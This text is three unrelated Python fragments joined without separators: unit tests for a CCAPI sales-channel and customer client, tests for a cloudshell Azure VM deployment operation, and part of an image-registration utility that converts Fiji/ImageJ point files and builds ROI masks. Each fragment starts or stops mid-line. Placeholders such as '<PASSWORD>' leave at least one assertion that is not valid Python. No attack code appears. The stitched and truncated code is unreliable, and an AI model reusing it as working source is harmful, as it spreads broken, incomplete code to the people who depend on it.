json=self.RESPONSE) CCAPI.update_range_on_sales_channel( range_id=self.RANGE_ID, request_type=self.REQUEST_TYPE, act=self.ACT, value=self.VALUE, option_id=self.OPTION_ID, channel_ids=self.CHANNEL_IDS, ) def test_update_range_on_sales_channel_method_sends_range_ID(self): """Test the update_range_on_sales_channel method sends a range ID.""" self.assertDataSent("rangeid", self.RANGE_ID) def test_update_range_on_sales_channel_method_sends_request_type(self): """Test update_range_on_sales_channel method sends a request type.""" self.assertDataSent("type", self.REQUEST_TYPE) def test_update_range_on_sales_channel_method_sends_act(self): """Test the update_range_on_sales_channel method sends an act.""" self.assertDataSent("act", self.ACT) def test_update_range_on_sales_channel_method_sends_value(self): """Test the update_range_on_sales_channel method sends a value.""" self.assertDataSent("val", self.VALUE) def test_update_range_on_sales_channel_method_sends_option_ID(self): """Test the update_range_on_sales_channel method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_update_range_on_sales_channel_method_sends_channel_IDs(self): """Test the update_range_on_sales_channel method sends channel IDs.""" self.assertDataSent("chans", self.CHANNEL_IDS) def test_update_range_on_sales_channel_method_sends_brand_ID(self): """Test the update_range_on_sales_channel method sends a brand ID.""" self.assertDataSent("brandid", 341) class Testupdate_range_settings_method(TestCCAPIMethod): """Test the ccapi.CCAPI.update_range_settings method.""" RESPONSE = '"OK"' RANGE_ID = "4355752" CURRENT_NAME = "Test Move Department 2" CURRENT_SKU = "RNG_UYV-3SP-W60" CURRENT_END_OF_LINE = False CURRENT_PRE_ORDER = False CURRENT_GROUP_ITEMS = False NEW_NAME = "Test Move Department 2" NEW_SKU = "RNG_UYV-3SP-W60" NEW_END_OF_LINE = "0" NEW_PRE_ORDER = False NEW_GROUP_ITEMS = False CHANNELS = ["3541", "3557"] def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.UpdateRangeSettings, text=self.RESPONSE) CCAPI.update_range_settings( range_id=self.RANGE_ID, current_name=self.CURRENT_NAME, current_sku=self.CURRENT_SKU, current_end_of_line=self.CURRENT_END_OF_LINE, current_pre_order=self.CURRENT_PRE_ORDER, current_group_items=self.CURRENT_GROUP_ITEMS, new_name=self.NEW_NAME, new_sku=self.NEW_SKU, new_end_of_line=self.NEW_END_OF_LINE, new_pre_order=self.NEW_PRE_ORDER, new_group_items=self.NEW_GROUP_ITEMS, channels=self.CHANNELS, ) def test_update_range_settings_sends_range_id(self): """Test the method sends the passed range ID.""" self.assertJsonValueSent("rangeID", self.RANGE_ID) def test_update_range_settings_sends_current_name(self): """Test the method sends the passed current name.""" self.assertJsonValueSent("currName", self.CURRENT_NAME) def test_update_range_settings_sends_current_sku(self): """Test the method sends the passed current SKU.""" self.assertJsonValueSent("currSKU", self.CURRENT_SKU) def test_update_range_settings_sends_current_end_of_line(self): """Test the method sends the passed current end of line.""" self.assertJsonValueSent("currEoL", int(self.CURRENT_END_OF_LINE)) def test_update_range_settings_sends_current_pre_order(self): """Test the method sends the passed current pre order.""" self.assertJsonValueSent("currPreO", int(self.CURRENT_PRE_ORDER)) def test_update_range_settings_sends_current_group_items(self): """Test the method sends the passed current group items.""" self.assertJsonValueSent("currGBy", str(int(self.CURRENT_GROUP_ITEMS))) def test_update_range_settings_sends_new_name(self): """Test the method sends the passed new name.""" self.assertJsonValueSent("newName", self.NEW_NAME) def test_update_range_settings_sends_new_sku(self): """Test the method sends the passed new SKU.""" self.assertJsonValueSent("newSKU", self.NEW_SKU) def test_update_range_settings_sends_new_end_of_line(self): """Test the method sends the passed new end of line.""" self.assertJsonValueSent("newEoL", str(int(self.NEW_END_OF_LINE))) def test_update_range_settings_sends_new_pre_order(self): """Test the method sends the passed new pre order.""" self.assertJsonValueSent("newPreO", str(int(self.NEW_PRE_ORDER))) def test_update_range_settings_sends_new_group_items(self): """Test the method sends the passed new group items.""" self.assertJsonValueSent("newGBy", str(int(self.NEW_GROUP_ITEMS))) def test_update_range_settings_sends_channels(self): """Test the method sends the passed channels.""" self.assertJsonValueSent("channels", self.CHANNELS) def test_update_range_settings_sends_brand_id(self): """Test the method sends the passed brand ID.""" self.assertJsonValueSent("brandID", 341) class Test_add_customer_Method(TestCCAPIMethod): """Test the ccapi.add_customer_method.""" CUSTOMER_ID = test_requests.test_handlers.TestAddCustomer.CUSTOMER_ID RESPONSE = test_requests.test_handlers.TestAddCustomer.RESPONSE ACCOUNT_NAME = "<NAME>" ADDRESS_1 = "1 Way Street" ADDRESS_2 = "Villageton" AGENT_ID = 3 COMPANY_FAX = "02135 465135" COMPANY_MOBILE = "09135 453 901" COMPANY_TELEPHONE = "132485 63156" CONTACT_EMAIL = "<EMAIL>" CONTACT_FAX = "15441 8464 6541" CONTACT_MOBILE = "09874 751 665" CONTACT_NAME = "Contact Test Customer" CONTACT_PHONE = "01324 164861" COUNTRY = "United Kingdom" COUNTY = "Townshire" CUSTOMER_NAME = "<NAME>" CUSTOMER_TYPE = 6 EU_VAT = False POST_CODE = "ES23 5LN" PAYMENT_TERMS = 3 SELLING_CHANNEL_ID = "3541" SPECIAL_INSTRUCTIONS_NOTE = "Leave packages in Porch." TOWN = "Townsville" TRADE_NAME = "Shop Co." VAT_NUMBER = "8759453" CREDIT_LIMIT = 7 def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.handlers.AddCustomer, text=self.RESPONSE) self.returned_value = CCAPI.add_customer( customer_name=self.CUSTOMER_NAME, address_1=self.ADDRESS_1, country=self.COUNTRY, selling_channel_id=self.SELLING_CHANNEL_ID, address_2=self.ADDRESS_2, town=self.TOWN, post_code=self.POST_CODE, account_name=self.ACCOUNT_NAME, agent_id=self.AGENT_ID, company_fax=self.COMPANY_FAX, company_mobile=self.COMPANY_MOBILE, company_telephone=self.COMPANY_TELEPHONE, contact_email=self.CONTACT_EMAIL, contact_fax=self.CONTACT_FAX, contact_name=self.CONTACT_NAME, contact_phone=self.CONTACT_PHONE, contact_mobile=self.CONTACT_MOBILE, county=self.COUNTY, customer_type=self.CUSTOMER_TYPE, eu_vat=self.EU_VAT, payment_terms=self.PAYMENT_TERMS, trade_name=self.TRADE_NAME, vat_number=self.VAT_NUMBER, special_instructions=self.SPECIAL_INSTRUCTIONS_NOTE, credit_limit=self.CREDIT_LIMIT, ) def test_add_customer_returns_customer_ID(self): """Test the add_customer method of CCAPI returns a customer ID.""" self.assertEqual(self.returned_value, self.CUSTOMER_ID) def test_add_customer_sends_account_name(self): """Test the add_customer method sends an account name.""" self.assertDataSent("AcctName", self.ACCOUNT_NAME) def test_add_customer_sends_address_1(self): """Test the add_customer method sends the first line of the address.""" self.assertDataSent("addr1", self.ADDRESS_1) def test_add_customer_sends_address_2(self): """Test the add_customer method sends the second line of the address.""" self.assertDataSent("addr2", self.ADDRESS_2) def test_add_customer_sends_agent_ID(self): """Test the add_customer method sends the agent ID.""" self.assertDataSent("agentID", self.AGENT_ID) def test_add_customer_sends_company_fax(self): """Test the add_customer method sends the company fax.""" self.assertDataSent("compFax", self.COMPANY_FAX) def test_add_customer_sends_company_mobile(self): """Test the add_customer method sends the company mobile.""" self.assertDataSent("compMob", self.COMPANY_MOBILE) def test_add_customer_sends_company_telephone(self): """Test the add_customer method sends the company telephone.""" self.assertDataSent("compTel", self.COMPANY_TELEPHONE) def test_add_customer_sends_contact_email(self): """Test the add_customer method sends the contact email.""" self.assertDataSent("contEmail", self.CONTACT_EMAIL) def test_add_customer_sends_contact_fax(self): """Test the add_customer method sends the contact fax.""" self.assertDataSent("contFax", self.CONTACT_FAX) def test_add_customer_sends_contact_mobile(self): """Test the add_customer method sends the contact mobile.""" self.assertDataSent("contMob", self.CONTACT_MOBILE) def test_add_customer_sends_contact_name(self): """Test the add_customer method sends the contact name.""" self.assertDataSent("contName", self.CONTACT_NAME) def test_add_customer_sends_contact_phone(self): """Test the add_customer method sends the contact phone.""" self.assertDataSent("contPhone", self.CONTACT_PHONE) def test_add_customer_sends_country(self): """Test the add_customer method sends the country.""" self.assertDataSent("country", self.COUNTRY) def test_add_customer_sends_county(self): """Test the add_customer method sends the county.""" self.assertDataSent("county", self.COUNTY) def test_add_customer_sends_customer_name(self): """Test the add_customer method sends the customer name.""" self.assertDataSent("CustName", self.CUSTOMER_NAME) def test_add_customer_sends_customer_type(self): """Test the add_customer method sends the customer type.""" self.assertDataSent("CustType", self.CUSTOMER_TYPE) def test_add_customer_sends_EU_VAT(self): """Test the add_customer method sends the EU VAT.""" self.assertDataSent("EUVAT", int(bool(self.EU_VAT))) def test_add_customer_sends_post_code(self): """Test the
from unittest import TestCase from azure.mgmt.compute.models import OperatingSystemTypes from mock import MagicMock from mock import Mock from cloudshell.cp.azure.domain.services.network_service import NetworkService from cloudshell.cp.azure.domain.services.storage_service import StorageService from cloudshell.cp.azure.domain.services.tags import TagService from cloudshell.cp.azure.domain.services.virtual_machine_service import VirtualMachineService from cloudshell.cp.azure.domain.vm_management.operations.deploy_operation import DeployAzureVMOperation from cloudshell.cp.azure.models.azure_cloud_provider_resource_model import AzureCloudProviderResourceModel from cloudshell.cp.azure.models.deploy_azure_vm_resource_models import DeployAzureVMResourceModel from cloudshell.cp.core.models import Attribute class TestDeployAzureVMOperation(TestCase): def setUp(self): self.logger = Mock() self.storage_service = MagicMock() self.vm_service = VirtualMachineService(MagicMock()) self.network_service = NetworkService(MagicMock(), MagicMock()) self.vm_credentials_service = Mock() self.key_pair_service = Mock() self.security_group_service = MagicMock() self.tags_service = TagService() self.name_provider_service = MagicMock() self.vm_extension_service = MagicMock() self.generic_lock_provider = MagicMock() self.cancellation_service = MagicMock() self.image_data_factory = MagicMock() self.vm_details_provider = MagicMock() self.deploy_operation = DeployAzureVMOperation(vm_service=self.vm_service, network_service=self.network_service, storage_service=self.storage_service, vm_credentials_service=self.vm_credentials_service, key_pair_service=self.key_pair_service, tags_service=self.tags_service, security_group_service=self.security_group_service, name_provider_service=self.name_provider_service, vm_extension_service=self.vm_extension_service, generic_lock_provider=self.generic_lock_provider, cancellation_service=self.cancellation_service, image_data_factory=self.image_data_factory, vm_details_provider=self.vm_details_provider) def test_get_sandbox_subnet(self): """Check that method will call network service to get sandbox vNet and will return it's subnet by given name""" network_client = MagicMock() cloud_provider_model = MagicMock() subnet_name = "testsubnetname" sandbox_subnet = MagicMock() sandbox_subnet.name = subnet_name self.network_service.get_sandbox_virtual_network = MagicMock( return_value=MagicMock(subnets=[MagicMock(), MagicMock(), sandbox_subnet])) # Act subnet = self.deploy_operation._get_sandbox_subnet( network_client=network_client, cloud_provider_model=cloud_provider_model, subnet_name=subnet_name, logger=self.logger) # Verify self.network_service.get_sandbox_virtual_network.assert_called_once_with( network_client=network_client, group_name=cloud_provider_model.management_group_name) self.assertEqual(subnet, sandbox_subnet) def test_get_sandbox_subnet_will_raise_no_valid_subnet_exception(self): """Check that method will raise Exception if there is no subnet with given name under the MGMT network""" network_client = MagicMock() cloud_provider_model = MagicMock() subnet_name = "testsubnetname" self.network_service.get_sandbox_virtual_network = MagicMock( return_value=MagicMock(subnets=[MagicMock(), MagicMock(), MagicMock()])) with self.assertRaisesRegexp(Exception, "Could not find a valid subnet."): self.deploy_operation._get_sandbox_subnet( network_client=network_client, cloud_provider_model=cloud_provider_model, subnet_name=subnet_name, logger=Mock()) def test_get_public_ip_address(self): """Check that method will use network service to get Public IP by it's name""" network_client = MagicMock() azure_vm_deployment_model = MagicMock(add_public_ip=True) group_name = "testgroupname" ip_name = "testipname" expected_ip_addr = "10.10.10.10" public_ip = MagicMock(ip_address=expected_ip_addr) cancellation_context = MagicMock() self.network_service.get_public_ip = MagicMock(return_value=public_ip) # Act ip_addr = self.deploy_operation._get_public_ip_address( network_client=network_client, azure_vm_deployment_model=azure_vm_deployment_model, group_name=group_name, ip_name=ip_name, cancellation_context=cancellation_context, logger=self.logger) # Verify self.assertEqual(ip_addr, expected_ip_addr) def test_get_public_ip_address_add_public_ip_is_false(self): """Check that method will return None if "add_public_ip" attribute is False""" network_client = MagicMock() azure_vm_deployment_model = MagicMock(add_public_ip=False) group_name = "testgroupname" ip_name = "testipname" cancellation_context = MagicMock() self.network_service.get_public_ip = MagicMock() # Act ip_addr = self.deploy_operation._get_public_ip_address( network_client=network_client, azure_vm_deployment_model=azure_vm_deployment_model, group_name=group_name, ip_name=ip_name, cancellation_context=cancellation_context, logger=self.logger) # Verify self.assertIsNone(ip_addr) self.network_service.get_public_ip.assert_not_called() def test_deploy_vm_generic(self): """ This method verifies the basic deployment of vm. :return: """ # Arrange resource_model = DeployAzureVMResourceModel() data = Mock() updated_data = Mock() updated_data.vm_credentials = Mock() deployed_app_attributes = Mock() self.deploy_operation._prepare_deploy_data = Mock(return_value=data) self.deploy_operation._create_vm_common_objects = Mock(return_value=updated_data) self.deploy_operation._create_vm_custom_script_extension = Mock() self.deploy_operation._prepare_deployed_app_attributes = Mock(return_value=deployed_app_attributes) self.deploy_operation._get_public_ip_address = Mock(return_value="pub_ip_address") vm = Mock() create_vm_action = Mock(return_value=vm) cancellation_context = Mock() reservation = Mock() cloud_provider_model = Mock() logger = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cloudshell_session = Mock() # Act result = self.deploy_operation._deploy_vm_generic(create_vm_action=create_vm_action, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Verify self.assertEquals(self.cancellation_service.check_if_cancelled.call_count, 2) self.cancellation_service.check_if_cancelled.assert_called_with(cancellation_context) self.deploy_operation._prepare_deploy_data.assert_called_once_with( logger=logger, reservation=reservation, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, network_client=network_client, storage_client=storage_client, compute_client=compute_client) self.deploy_operation._create_vm_common_objects.assert_called_once_with( logger=logger, data=data, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, network_client=network_client, storage_client=storage_client, cancellation_context=cancellation_context) create_vm_action.assert_called_once_with( deployment_model=resource_model, cloud_provider_model=cloud_provider_model, data=updated_data, compute_client=compute_client, cancellation_context=cancellation_context, logger=logger) self.deploy_operation._create_vm_custom_script_extension.assert_called_once_with( deployment_model=resource_model, cloud_provider_model=cloud_provider_model, compute_client=compute_client, data=updated_data, logger=logger, cancellation_context=cancellation_context) self.deploy_operation._get_public_ip_address.assert_called_once_with( network_client=network_client, azure_vm_deployment_model=resource_model, group_name=updated_data.group_name, ip_name=updated_data.ip_name, cancellation_context=cancellation_context, logger=logger) self.deploy_operation._prepare_deployed_app_attributes.assert_called_once_with( admin_username=updated_data.vm_credentials.admin_username, admin_password=<PASSWORD>, public_ip=updated_data.public_ip_address ) self.assertEquals(updated_data.public_ip_address, "pub_ip_address") self.assertEquals(result.vmName, updated_data.vm_name) self.assertEquals(result.vmUuid, vm.vm_id) self.assertEquals(result.deployedAppAttributes, deployed_app_attributes) self.assertEquals(result.deployedAppAddress, updated_data.private_ip_address) def test_deploy_from_custom_image(self): # Arrange expected_result = Mock() self.deploy_operation._deploy_vm_generic = Mock(return_value=expected_result) self.deploy_operation._create_vm_custom_image_action = Mock() azure_vm_deployment_model = Mock() cloud_provider_model = Mock() reservation = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cancellation_context = Mock() logger = Mock() cloudshell_session=Mock() # Act res = self.deploy_operation.deploy_from_custom_image( deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Assert self.assertEquals(expected_result, res) self.deploy_operation._deploy_vm_generic.assert_called_once_with( create_vm_action=self.deploy_operation._create_vm_custom_image_action, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, storage_client=storage_client, compute_client=compute_client, network_client=network_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) def test_deploy_from_marketplace(self): # Arrange expected_result = Mock() self.deploy_operation._deploy_vm_generic = Mock(return_value=expected_result) self.deploy_operation._create_vm_custom_image_action = Mock() azure_vm_deployment_model = Mock() cloud_provider_model = Mock() reservation = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cancellation_context = Mock() logger = Mock() cloudshell_session=Mock() # Act res = self.deploy_operation.deploy_from_marketplace( deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Assert self.assertEquals(expected_result, res) self.deploy_operation._deploy_vm_generic.assert_called_once_with( create_vm_action=self.deploy_operation._create_vm_marketplace_action, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, storage_client=storage_client, compute_client=compute_client, network_client=network_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) def test_create_vm_custom_image_action(self): """Check deploy from custom Image operation""" # Arrange azure_vm_deployment_model = MagicMock() azure_vm_deployment_model.image_name = "some_image" azure_vm_deployment_model.image_resource_group = "image_group" cloud_provider_model = MagicMock() logger = MagicMock() compute_client = Mock() cancellation_context = MagicMock() data = Mock() data.group_name = "group" self.vm_service.create_vm_from_custom_image = Mock() # Act self.deploy_operation._create_vm_custom_image_action( compute_client=compute_client, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, data=data, cancellation_context=cancellation_context, logger=logger) # Verify self.cancellation_service.check_if_cancelled.assert_called_with(cancellation_context) self.cancellation_service.check_if_cancelled.assert_called() self.vm_service.create_vm_from_custom_image.assert_called_once_with( compute_management_client=compute_client, image_name=azure_vm_deployment_model.image_name, image_resource_group=azure_vm_deployment_model.image_resource_group, disk_type=azure_vm_deployment_model.disk_type, vm_credentials=data.vm_credentials, computer_name=data.computer_name, group_name=data.group_name, nic_id=data.nic.id, region=cloud_provider_model.region, vm_name=data.vm_name, tags=data.tags, vm_size=data.vm_size, cancellation_context=cancellation_context) def test_create_vm_marketplace_action(self): """Check deploy from custom Image operation""" # Arrange azure_vm_deployment_model = MagicMock() cloud_provider_model = MagicMock() logger = MagicMock() compute_client = Mock() cancellation_context = MagicMock() data = Mock() self.vm_service.create_vm_from_marketplace = Mock() # Act self.deploy_operation._create_vm_marketplace_action( compute_client=compute_client, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, data=data, cancellation_context=cancellation_context, logger=logger) # Verify self.vm_service.create_vm_from_marketplace.assert_called_once_with( compute_management_client=compute_client, image_offer=azure_vm_deployment_model.image_offer, image_publisher=azure_vm_deployment_model.image_publisher, image_sku=azure_vm_deployment_model.image_sku, image_version=azure_vm_deployment_model.image_version, disk_type=azure_vm_deployment_model.disk_type, vm_credentials=data.vm_credentials, computer_name=data.computer_name, group_name=data.group_name, nic_id=data.nic.id, region=cloud_provider_model.region, vm_name=data.vm_name, tags=data.tags, vm_size=data.vm_size, purchase_plan=data.image_model.purchase_plan, cancellation_context=cancellation_context) def test_deploy_vm_generic_delete_all_resources_on_error(self): """ Check that method will delete all created resources in case of any Exception occurs while deploying""" # Arrange resource_model = DeployAzureVMResourceModel() data = Mock() updated_data = Mock() updated_data.vm_credentials = Mock() deployed_app_attributes = Mock() self.deploy_operation._prepare_deploy_data = Mock(return_value=data) self.deploy_operation._create_vm_common_objects = Mock(return_value=updated_data) self.deploy_operation._create_vm_custom_script_extension = Mock() self.deploy_operation._prepare_deployed_app_attributes = Mock(return_value=deployed_app_attributes) cancellation_context = Mock() reservation = Mock() cloud_provider_model = Mock() logger = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cloudshell_session = Mock() create_vm_action = Mock(side_effect=Exception) self.deploy_operation._rollback_deployed_resources = Mock() # Act with self.assertRaises(Exception): self.deploy_operation._deploy_vm_generic(create_vm_action=create_vm_action, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Verify self.deploy_operation._rollback_deployed_resources.assert_called_once_with( compute_client=compute_client, network_client=network_client, group_name=updated_data.group_name, interface_name=updated_data.interface_name, ip_name=updated_data.ip_name, vm_name=updated_data.vm_name, logger=logger) def test_deploy_operation_virtual_networks_validation(self): # todo - add tests for validations pass def test_rollback_deployed_resources(self): """Check that deploy rollback method will delete resources""" self.network_service.delete_nic = Mock() self.network_service.delete_ip = Mock() self.vm_service.delete_vm = Mock() # Act self.deploy_operation._rollback_deployed_resources(compute_client=MagicMock(), network_client=MagicMock(), group_name=MagicMock(), interface_name=MagicMock(), vm_name=MagicMock(), ip_name=MagicMock(), logger=MagicMock()) # Verify self.network_service.delete_nic.assert_called_once() self.network_service.delete_ip.assert_called_once() self.vm_service.delete_vm.assert_called_once() def test_process_nsg_rules(self): """Check that method validates NSG is single per group and uses security group service for rules creation""" group_name = "test_group_name" network_client = MagicMock() azure_vm_deployment_model = MagicMock() nic = MagicMock() cancellation_context = MagicMock() logger = MagicMock() security_groups_list = MagicMock() self.deploy_operation.security_group_service.list_network_security_group.return_value = security_groups_list self.deploy_operation._validate_resource_is_single_per_group = MagicMock() self.deploy_operation.security_group_service.get_network_security_group.return_value = security_groups_list[0] lock = Mock() self.generic_lock_provider.get_resource_lock = Mock(return_value=lock) # Act self.deploy_operation._process_nsg_rules( network_client=network_client, group_name=group_name, azure_vm_deployment_model=azure_vm_deployment_model, nic=nic, cancellation_context=cancellation_context, logger=logger) # Verify self.deploy_operation.security_group_service.get_network_security_group.assert_called_once_with( network_client=network_client, group_name=group_name) self.deploy_operation.security_group_service.create_network_security_group_rules.assert_called_once_with( destination_addr=nic.ip_configurations[0].private_ip_address, group_name=group_name, inbound_rules=[], network_client=network_client, security_group_name=security_groups_list[0].name, lock=lock) def test_process_nsg_rules_inbound_ports_attribute_is_empty(self): """Check that method will not call security group service for NSG rules creation if there are no rules""" group_name = "test_group_name" network_client = MagicMock() azure_vm_deployment_model = MagicMock() nic = MagicMock() cancellation_context = MagicMock() logger = MagicMock() self.deploy_operation._validate_resource_is_single_per_group = MagicMock() azure_vm_deployment_model.inbound_ports = "" # Act self.deploy_operation._process_nsg_rules( network_client=network_client, group_name=group_name, azure_vm_deployment_model=azure_vm_deployment_model, nic=nic, cancellation_context=cancellation_context, logger=logger) # Verify self.deploy_operation.security_group_service.list_network_security_group.assert_not_called() self.deploy_operation._validate_resource_is_single_per_group.assert_not_called() self.deploy_operation.security_group_service.create_network_security_group_rules.assert_not_called() def test_validate_resource_is_single_per_group(self): """Check that method will not throw Exception if length of resource list is equal to 1""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [MagicMock()] try: # Act self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) except Exception as e: # Verify self.fail("Method should not raise any exception. Got: {}: {}".format(type(e), e)) def test_validate_deployment_model_raises_exception(self): """Check that method will raise Exception if "Add Public IP" attr is False and "Inbound Ports" is not empty""" vm_deployment_mode = MagicMock(inbound_ports="80:tcp", add_public_ip=False) with self.assertRaises(Exception): self.deploy_operation._validate_deployment_model(vm_deployment_mode) def test_validate_resource_is_single_per_group_several_resources(self): """Check that method will not throw Exception if length of resource list is more than 1""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [MagicMock(), MagicMock(), MagicMock()] with self.assertRaises(Exception): self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) def test_validate_resource_is_single_per_group_missing_resource(self): """Check that method will throw Exception if resource list is empty""" group_name = "test_group_name" resource_name = MagicMock() resource_list = [] with self.assertRaises(Exception): self.deploy_operation._validate_resource_is_single_per_group(resource_list, group_name, resource_name) def test_prepare_computer_name_win(self): """ Check that method will use NameProviderService.generate_name to process computer name and correct length is selected based on the OS type """ computer_name = MagicMock() self.name_provider_service.generate_name = Mock(return_value=computer_name) os_type = OperatingSystemTypes.windows postfix = Mock() name = "test_name" # Act res = self.deploy_operation._prepare_computer_name(name=name, postfix=postfix, os_type=os_type) # Verify self.name_provider_service.generate_name.assert_called_once_with(name=name, postfix=postfix, max_length=15) self.assertEqual(res, computer_name) def test_prepare_computer_name_linux(self): """ Check that method will use NameProviderService.generate_name to process computer name and correct length is selected based on the OS type """ computer_name = MagicMock() self.name_provider_service.generate_name = Mock(return_value=computer_name) os_type = OperatingSystemTypes.linux postfix = Mock() name = "test_name" # Act res = self.deploy_operation._prepare_computer_name(name=name, postfix=postfix, os_type=os_type) # Verify self.name_provider_service.generate_name.assert_called_once_with(name=name, postfix=postfix, max_length=64) self.assertEqual(res, computer_name) def test_prepare_vm_size_retrieve_attr_from_deployment_model(self): """Check that method will retrieve "vm_size" attribute from deployment model if attr is not empty""" expected_vm_size = MagicMock() cloud_provider_model = MagicMock(vm_size="") azure_vm_deployment_model = MagicMock(vm_size=expected_vm_size) # Act res = self.deploy_operation._prepare_vm_size(azure_vm_deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model) # Verify self.assertEqual(res, expected_vm_size) def test_prepare_vm_size_retrieve_default_attr_from_cp_model(self): """Check that method will retrieve "vm_size" attr from
#Image Registration Functions #<NAME> import matplotlib.pyplot as plt import numpy as np import sys import time import os import re import nibabel as nib from pathlib import Path import pandas as pd import shutil import glob import fileinput import cv2 from joblib import Parallel, delayed from numba import njit, prange import subprocess import utils #-----------------General Utility Functions for Registration----------------------- def FormatFijiPointsFromCSV(input_file,selection_type): """This function will take the csv point selection file that you export from using control+m in fiji (ImageJ) to the correct text file format to use with elastix image registration selection_type must be the string 'index' or 'points'""" #Get the current directory tmp_path = Path('..') home_dir=tmp_path.cwd() #Read the csv file that you input data = pd.read_csv(input_file) #Get the image folder name parent=Path(input_file).parent #Change the directory to the parent folder so we know where to export os.chdir(parent) #Remove the file extension prefix=Path(input_file).stem #Rename the first column for ease of access data.rename(columns = {list(data)[0]:'Landmark'}, inplace=True) #Create a new text file txt_file = open(prefix+".txt","w+") #Create first string to write to your file str_list = [str(selection_type),str(max(data['Landmark']))] txt_file.writelines(i + '\n' for i in str_list) #Close and save the txt file txt_file.close() #Get only the data we need for the text file point_tab = data[['X','Y']] #Now append the data table to the txt file point_tab.to_csv(prefix+".txt", header=False, index=False, sep=' ', mode='a') #Change the current directory back to the home directory os.chdir(home_dir) def FormatRegionFromFiji(input_file,selection_type="index"): """This function will take a set of points that you set and export in ImageJ using Analyze > Tools > Save XY coordinates plugin""" #Get the current directory tmp_path = Path('..') home_dir=tmp_path.cwd() #Read the csv file that you input data = pd.read_csv(input_file) #Get the image folder name parent=Path(input_file).parent #Change the directory to the parent folder so we know where to export os.chdir(parent) #Remove the file extension prefix=Path(input_file).stem #Create a new text file txt_file = open(prefix+".txt","w+") #Create first string to write to your file str_list = [str(selection_type),str(data.shape[0])] txt_file.writelines(i + '\n' for i in str_list) #Close and save the txt file txt_file.close() #Get only the data we need for the text file point_tab = data[['X','Y']] #Now append the data table to the txt file point_tab.to_csv(prefix+".txt", header=False, index=False, sep=' ', mode='a') #Change the current directory back to the home directory os.chdir(home_dir) def GetROImask(dir,full_size,ROI_correction = None): """This function will take the check all subdirectories for csv files exported from using Analyze > Tools > Save XY coordinates plugin. It will then create a mask for each of those ROIs based on the full image coordinates so that each region can be extracted efficiently. dir: The directory that you want to do a subdirectory search on for csv files. full_image: Full image to use for masking ROI from ROI_correction: correction to be added to the dimensions of the ROI Returns a dictionary object with keys being the folders detected and the values being the masks created based on csv files in folders and the full image Note: We will use this function with ROIs defined on the toluidine blue image and we use it to extract the ROIs from the final registered full MSI UMAP image """ #Get the names of the folders in your directory filenames = [file for file in os.listdir(dir) if os.path.isdir(os.path.join(dir,file))] #Get all csv files in those directories #***Note that we are traversing all directory so may need to change to avoid prblems*** csv_files = utils.TraverseDir(ending="coordinates.csv") #Create a dictionary object for our ROIs that contains the folder names with csv full paths ROI_dict = dict(zip(filenames, csv_files)) #Create a new dictionary object to store the masks and coordinates in ROI_masks = {} #Access the dictionary ROI object to load the mask coordinates from csv files for ROI, filename in ROI_dict.items(): #Read csv file_cont = pd.read_csv(filename) #Get the XY coordinates from the dataframe point_tab = file_cont[['X','Y']] #Create a mask for each of these ROI regions tp_left = (point_tab[['X']].values.min()-1,point_tab[['Y']].values.min()-1) bt_right = (point_tab[['X']].values.max()-1,point_tab[['Y']].values.max()-1) #Create a blank mask - ***Order is 1 and 0 for the nifti image format***** mask = np.zeros(shape=(full_size[1],full_size[0]),dtype="uint8") #Draw rectangle on the mask using opencv cv2.rectangle(img=mask,pt1=tp_left,pt2=bt_right,color=(255,255,255),thickness=-1) #Extract sliced, nonzero regions from your original image nonzero = np.nonzero(mask) minx = min(nonzero[0]) maxx = max(nonzero[0]) miny = min(nonzero[1]) maxy = max(nonzero[1]) #Check to see if we are adding overlap to our ROIs if ROI_correction is not None: print('Detected ROI Correction Factor...') minx = (minx-(ROI_correction)) maxx = (maxx+(ROI_correction)) miny = (miny-(ROI_correction)) maxy = (maxy+(ROI_correction)) #Add the mask in this iteration to our dictionary object ROI_masks.update({str(ROI):[minx,maxx,miny,maxy]}) #Report that the masking is complete print('Finished getting coordinates') #Return the dictionary object return ROI_masks def CreateMaskFromCoords(filenames_list,full_image,invert=False): """Function for reading in ROI coordinates and converting them to a mask. Currently only accepts nifti format for the full_image. Option to invert the mask""" #Read the full image full_im = nib.load(str(full_image)).get_fdata().T #Get the full array size full_size=full_im.shape #Create a blank mask - ***Order is 1 and 0 for the nifti image format***** mask = np.zeros(shape=(full_size[0],full_size[1]),dtype="uint8") #Iterate through each ROI csv file for roi in filenames_list: #Read csv file_cont = pd.read_csv(roi) #Get the XY coordinates from the dataframe point_tab = file_cont[['X','Y']] #Create a mask for each of these ROI regions tp_left = 